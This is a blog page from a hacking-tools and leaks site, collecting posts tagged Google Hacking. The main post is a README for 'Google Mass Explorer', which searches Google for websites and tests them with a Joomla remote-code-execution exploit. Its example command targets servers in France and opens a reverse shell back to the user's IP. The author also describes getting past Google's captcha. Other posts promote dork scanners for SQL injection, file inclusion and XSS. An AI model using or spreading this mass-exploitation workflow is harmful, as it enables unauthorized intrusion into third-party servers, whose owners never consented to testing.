Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

Showing posts with label Google Hacking. Show all posts

Monday, December 12, 2016

Google Mass Explorer - Google Explorer



[+] Google Mass Explorer

This is an automated robot for the Google search engine.
It makes a Google search and parses the results for a specific exploit you define. The options can be listed with the --help parameter.


Intro:
This project is a main project that I will keep upgrading when new exploits are published. The idea is to use the Google search engine to find vulnerable targets for specific exploits. The exploit parsers will be concentrated in the google_parsers module. So when you make a search, you can explicitly choose, in the "--exploit_parser" argument, a specific exploit for the robot to test whether the targets are vulnerable to it or not.
** !!! It is very important that you use the right dork for the specific exploit.
The google parsers module (google_parsers.py) is the file that I will keep upgrading. For this version I'm putting in just the Joomla CVE exploit. I have a WordPress bot too, but the idea is that you make your own parsers =))) If you have difficulty making one, just send me the exploit and we'll make it together =))
I made this Google explorer because I'm very busy, and it takes too much time to search for targets in Google manually. So I used an automated framework (Selenium) to make a robot to search for targets for me ;)) The problem with using other libs and modules is the captcha from Google; using Selenium, you can type the captcha when it is displayed, and the robot keeps crawling with no problem =)) This was the only way I found to "bypass" this kind of protection... After it worked, I decided to publish it to everyone.

How the robot works:
1 - Make a google search
2 - Parse the results from each page
3 - Test if each target is vulnerable for a specific exploit.

Requirements:
!!!!!! PYTHON 3 !!!!!!
The requirements are in the requirements.txt file; you should install what is listed in it with:
$ sudo pip install -r requirements.txt
These are some examples that you can use, and make your own:
python3 google_explorer.py --dork="site:*.com inurl:index.php?option=" --browser="chrome" --exploit_parser="joomla_15_12_2015_rce" --revshell="MY_PUBLIC_IP" --port=4444 --google_domain="google.com" --location="França" --last_update="no último mês"
In this example, I'm looking for servers in France that are vulnerable to the Joomla RCE, using the google.com domain for the Google search (the domains are listed in the google_doomais.txt file), with last update in the last month.
All these options are possible in any language; it depends only on the syntax Google uses for your country.
I have some old videos on my YouTube channel showing how it works, so take a look at the descriptions of the older projects on GitHub if you need some video examples ;))

Usage:
    google_explorer.py --dork=<arg> --browser=<arg> [--exploit_parser=<arg>] [--language=<arg>]
                       [--location=<arg>] [--last_update=<arg>]
                       [--revshell=<arg>] [--port=<arg>]
                       [--google_domain=<arg>]

    google_explorer.py --help
    google_explorer.py --version

Options:
    -h --help                                Open help menu
    -v --version                             Show version

Required options:
    --dork='google dork'                     your favorite g00gle dork :)
    --browser='browser'                      chrome
                                             chromium

Optional options:
    --language='page language'               Portuguese
                                             English
                                             Arabic
                                             Romanian
                                             ...
                                             ...

    --location='server location'             Brazil
                                             Mauritania
                                             Tunisia
                                             Marroco
                                             Japan
                                             ...
                                             ...

    --last_update='page last update'         anytime
                                             past 24 hours
                                             past week
                                             past month
                                             past year

    --exploit_parser='Name or CVE exploit'   joomla_15_12_2015_rce
                                             generic_parser

    --revshell='IP'                          public ip for reverse shell
    --port='PORT'                            port for back connect

    --google_domain='google domain'          google domain to use on search. Ex: google.co.uk


Friday, February 5, 2016

Ebook's - Google Hacking Pack



Google Hacking

Google hacking involves using advanced operators in the Google search engine to locate specific strings of text within search results. Some of the more popular examples are finding specific versions of vulnerable Web applications. The following search query would locate all web pages that have that particular text contained within them. It is normal for default installations of applications to include their running version in every page they serve, for example, "Powered by XOOPS 2.2.3 Final".




Friday, January 22, 2016

Python Script Searching - Dark D0rk3r




Dark D0rk3r

Dark D0rk3r is a python script that performs dork searching and searches for local file inclusion and SQL injection errors.





Wednesday, January 6, 2016

ATSCAN - Server, Site and Dork Scanner




Description:

  • ATSCAN Version 2 
  • Dork scanner. 
  • XSS scanner. 
  • Sqlmap. 
  • LFI scanner.
  • Filter wordpress and Joomla sites in the server. 
  • Find Admin page.
  • Decode / Encode MD5 + Base64. 

Libraries to install:

apt-get install libxml-simple-perl
NOTE: Works on Linux platforms.

Permissions & Execution:

$ chmod +x atscan.pl
$ perl ./atscan.pl


Monday, August 31, 2015

Google Hacking Dork List SQL


Some Dorks for Google Hacking SQL

Google Hacking Dork SQL

By Offensive Sec

Google Hacking Dorks RFI



Some Dorks for Google Hacking RFI

Google Hacking Dorks RFI

By Offensive Sec

Google Hacking Dorks LFI



Some Dorks for Google Hacking LFI

Google Hacking Dorks LFI

By Offensive Sec

Google Hacking Dork List XSS




Some Dorks for Google Hacking XSS

Google Hacking Dork XSS


By Offensive Sec